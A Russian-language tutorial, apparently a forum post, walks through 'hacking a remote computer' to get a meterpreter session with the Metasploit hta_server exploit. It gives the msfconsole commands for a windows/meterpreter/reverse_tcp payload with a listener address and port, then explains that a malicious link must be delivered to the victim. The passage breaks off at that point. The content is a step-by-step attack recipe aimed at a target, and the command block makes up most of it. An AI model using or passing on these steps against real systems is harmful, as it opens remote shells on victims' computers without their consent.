Всем привет! В этой статье я хочу показать взлом удаленного компьютера, а точнее, получение сессии
meterpreter c помощью эксплойта -
hta_server.
Появился он недавно в версии
Metasploit Framework v4.12.34,
так, что прежде чем начать убеждаемся в ее наличии, если отсутствует, обновляемся:
>
apt-get update && apt-get upgrade –y && apt-get dist-upgrade
Запускаем Metasploit Framework:
>
msfconsole
В появившейся консоли фреймворка пишем:
Код:
use exploit/windows/misc/hta_server
set payload /windows/meterpreter/reverse_tcp
set LHOST 172.16.0.160
set SRVHOST 172.16.0.160
set LPORT 4444
exploit
Теперь, если все проделано, верно, видим экран с таким содержимым:
Теперь немного теории, первая строка обозначает, что обратное подключение (от жертвы) ожидается на адресе 172.16.0.160 и порту 4444.
Вторая, это ссылка которую необходимо доставить нашей цели, но не просто...